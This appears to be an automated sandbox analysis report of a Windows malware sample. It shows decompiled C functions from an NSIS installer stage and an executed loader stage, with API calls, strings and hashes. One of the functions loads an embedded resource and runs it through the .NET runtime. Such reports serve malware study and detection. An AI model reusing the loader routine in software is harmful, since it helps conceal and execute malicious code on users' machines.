                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-823278215
                • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402E3D(intOrPtr _a4) {
                				long _t2;
                				struct HWND__* _t3;
                				struct HWND__* _t6;
                
                				if(_a4 == 0) {
                					if( *0x429448 == 0) {
                						_t2 = GetTickCount();
                						if(_t2 >  *0x42f430) {
                							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
                							 *0x429448 = _t3;
                							return ShowWindow(_t3, 5);
                						}
                						return _t2;
                					} else {
                						return E0040653C(0);
                					}
                				} else {
                					_t6 =  *0x429448;
                					if(_t6 != 0) {
                						_t6 = DestroyWindow(_t6);
                					}
                					 *0x429448 = 0;
                					return _t6;
                				}
                			}

                APIs
                • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                • GetTickCount.KERNEL32 ref: 00402E6E
                • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00405B7D(void* __eflags, intOrPtr _a4) {
                				int _t11;
                				signed char* _t12;
                				intOrPtr _t18;
                				intOrPtr* _t21;
                				void* _t22;
                
                				E004060F7(0x42bc98, _a4);
                				_t21 = E00405B28(0x42bc98);
                				if(_t21 != 0) {
                					E004063D2(_t21);
                					if(( *0x42f43c & 0x00000080) == 0) {
                						L5:
                						_t22 = _t21 - 0x42bc98;
                						while(1) {
                							_t11 = lstrlenA(0x42bc98);
                							_push(0x42bc98);
                							if(_t11 <= _t22) {
                								break;
                							}
                							_t12 = E0040646B();
                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                								E00405AD6(0x42bc98);
                								continue;
                							} else {
                								goto L1;
                							}
                						}
                						E00405A8F();
                						return 0 | GetFileAttributesA(??) != 0xffffffff;
                					}
                					_t18 =  *_t21;
                					if(_t18 == 0 || _t18 == 0x5c) {
                						goto L1;
                					} else {
                						goto L5;
                					}
                				}
                				L1:
                				return 0;
                			}

                APIs
                  • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Template Method Pattern Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                  • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 3248276644-823278215
                • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                				int _t15;
                				long _t16;
                
                				_t15 = _a8;
                				if(_t15 != 0x102) {
                					if(_t15 != 0x200) {
                						_t16 = _a16;
                						L7:
                						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
                							_push(_t16);
                							_push(6);
                							 *0x42a87c = _t16;
                							E00404B4E();
                						}
                						L11:
                						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
                					}
                					if(IsWindowVisible(_a4) == 0) {
                						L10:
                						_t16 = _a16;
                						goto L11;
                					}
                					_t16 = E00404ACE(_a4, 1);
                					_t15 = 0x419;
                					goto L7;
                				}
                				if(_a12 != 0x20) {
                					goto L10;
                				}
                				E004041C7(0x413);
                				return 0;
                			}

                APIs
                • IsWindowVisible.USER32(?), ref: 004051C1
                • CallWindowProcA.USER32 ref: 00405212
                  • Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                				int _v8;
                				long _t21;
                				long _t24;
                				char* _t30;
                
                				asm("sbb eax, eax");
                				_v8 = 0x400;
                				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                				_t30 = _a16;
                				if(_t21 != 0) {
                					L4:
                					 *_t30 =  *_t30 & 0x00000000;
                				} else {
                					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                					_t21 = RegCloseKey(_a20);
                					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                						goto L4;
                					}
                				}
                				return _t21;
                			}

                APIs
                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Cgrlcpdlsle,0042A070,?,?,?,00000002,Cgrlcpdlsle,?,00406293,80000002), ref: 00406024
                • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Cgrlcpdlsle,Cgrlcpdlsle,Cgrlcpdlsle,?,0042A070), ref: 0040602F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CloseQueryValue
                • String ID: Cgrlcpdlsle
                • API String ID: 3356406503-1075718742
                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405796(CHAR* _a4) {
                				struct _PROCESS_INFORMATION _v20;
                				int _t7;
                
                				0x42c098->cb = 0x44;
                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20);
                				if(_t7 != 0) {
                					CloseHandle(_v20.hThread);
                					return _v20.hProcess;
                				}
                				return _t7;
                			}

                APIs
                Strings
                • Error launching installer, xrefs: 004057A9
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: Error launching installer
                • API String ID: 3712363035-66219284
                • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00403875() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t8;
                
                				_t8 =  *0x429854;
                				_t3 = E0040385A(_t2, 0);
                				if(_t8 != 0) {
                					do {
                						_t6 = _t8;
                						_t8 =  *_t8;
                						FreeLibrary( *(_t6 + 8));
                						_t3 = GlobalFree(_t6);
                					} while (_t8 != 0);
                				}
                				 *0x429854 =  *0x429854 & 0x00000000;
                				return _t3;
                			}

                APIs
                • FreeLibrary.KERNEL32(?,7519FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                • GlobalFree.KERNEL32 ref: 00403896
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 1100898210-823278215
                • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405AD6(char* _a4) {
                				char* _t3;
                				char* _t5;
                
                				_t5 = _a4;
                				_t3 =  &(_t5[lstrlenA(_t5)]);
                				while( *_t3 != 0x5c) {
                					_t3 = CharPrevA(_t5, _t3);
                					if(_t3 > _t5) {
                						continue;
                					}
                					break;
                				}
                				 *_t3 =  *_t3 & 0x00000000;
                				return  &(_t3[1]);
                			}

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\bGf2H3tXGg.exe,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405ADC
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\bGf2H3tXGg.exe,C:\Users\user\Desktop\bGf2H3tXGg.exe,80000000,00000003), ref: 00405AEA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-1246513382
                • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
                				int _v8;
                				int _t12;
                				int _t14;
                				int _t15;
                				CHAR* _t17;
                				CHAR* _t27;
                
                				_t12 = lstrlenA(_a8);
                				_t27 = _a4;
                				_v8 = _t12;
                				while(lstrlenA(_t27) >= _v8) {
                					_t14 = _v8;
                					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                					_t15 = lstrcmpiA(_t27, _a8);
                					_t27[_v8] =  *(_t14 + _t27);
                					if(_t15 == 0) {
                						_t17 = _t27;
                					} else {
                						_t27 = CharNextA(_t27);
                						continue;
                					}
                					L5:
                					return _t17;
                				}
                				_t17 = 0;
                				goto L5;
                			}

                APIs
                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
                • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                C-Code - Quality: 100%
                			E00401489() {
                				void* _v8;
                				struct HRSRC__* _t4;
                				long _t10;
                				struct HRSRC__* _t12;
                				void* _t16;
                
                				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                				_t12 = _t4;
                				if(_t12 == 0) {
                					L6:
                					ExitProcess(0);
                				}
                				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                				if(_t16 != 0) {
                					_v8 = LockResource(_t16);
                					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                					_t13 = _v8;
                					if(_v8 != 0 && _t10 != 0) {
                						L00401000(_t13, _t10); // executed
                					}
                				}
                				FreeResource(_t16);
                				goto L6;
                			}

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401E1D() {
                				_Unknown_base(*)()* _t1;
                
                				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                				return _t1;
                			}

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0225B730
                • GetCurrentThread.KERNEL32 ref: 0225B76D
                • GetCurrentProcess.KERNEL32 ref: 0225B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0225B803
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 1c488e92cdaf7fe93814caa941cba042d1a5633f63a876ee1804edc8f9a51775
                • Instruction ID: fc06f67bef88ab5cb916bd1802dd414bab84334b33555a052d753e7bae64213b
                • Opcode Fuzzy Hash: 1c488e92cdaf7fe93814caa941cba042d1a5633f63a876ee1804edc8f9a51775
                • Instruction Fuzzy Hash: AE5165B0A056898FDB10CFA9D9887EEBBF0EF49308F208499E419A7358D7349945CB65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0225B730
                • GetCurrentThread.KERNEL32 ref: 0225B76D
                • GetCurrentProcess.KERNEL32 ref: 0225B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0225B803
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 40a9da823b5cfc2ce1bbb5c31f7ddcd0b26f879d6215b9b3a2b942be88eff024
                • Instruction ID: f3000e50d48e9ba45c08c03972acf544b1bd3f5b3bc895108b9f5915c2b75831
                • Opcode Fuzzy Hash: 40a9da823b5cfc2ce1bbb5c31f7ddcd0b26f879d6215b9b3a2b942be88eff024
                • Instruction Fuzzy Hash: 3A5144B0E016498FDB10CFA9D588BEEBBF0BB48308F20C459E419B7358D7749944CB65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
                				void* _t6;
                				void* _t14;
                				void* _t18;
                				WCHAR* _t19;
                
                				_t14 = __ecx;
                				_t19 = GetEnvironmentStringsW();
                				if(_t19 != 0) {
                					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                					_t18 = _t6;
                					if(_t18 != 0) {
                						E0040ACF0(_t18, _t19, _t12);
                					}
                					E00403E03(0);
                					FreeEnvironmentStringsW(_t19);
                				} else {
                					_t18 = 0;
                				}
                				return _t18;
                			}

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0225962E
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: f5f4f00eab3a14fd396489731da817df70e997d53a5355a03c9e58fa584fc805
                • Instruction ID: 3c512b7b29233c18ec246264d0a279feb057fd50dc06fe54cc3bfd985b19d2db
                • Opcode Fuzzy Hash: f5f4f00eab3a14fd396489731da817df70e997d53a5355a03c9e58fa584fc805
                • Instruction Fuzzy Hash: 84712470A10B158FDB64DFA9D44079ABBF6BF88304F008929D88ADBA54DB74E845CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0225FD0A
                Memory Dump Source
                • Source File: 00000003.00000002.488662968.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 0f54f65badeb71447749ae380e65bb8753d9770ce66aa426276359eb935f1702
                • Instruction ID: f0d50bfe4ba4c5a1e8b37ff43f535409440e8b83c41e8dff981e12f1718daee9
                • Opcode Fuzzy Hash: 0f54f65badeb71447749ae380e65bb8753d9770ce66aa426276359eb935f1702
                • Instruction Fuzzy Hash: CD51CEB1D103599FDF14CFA9C984ADEBBB1FF89304F24812AE819AB214D7749945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
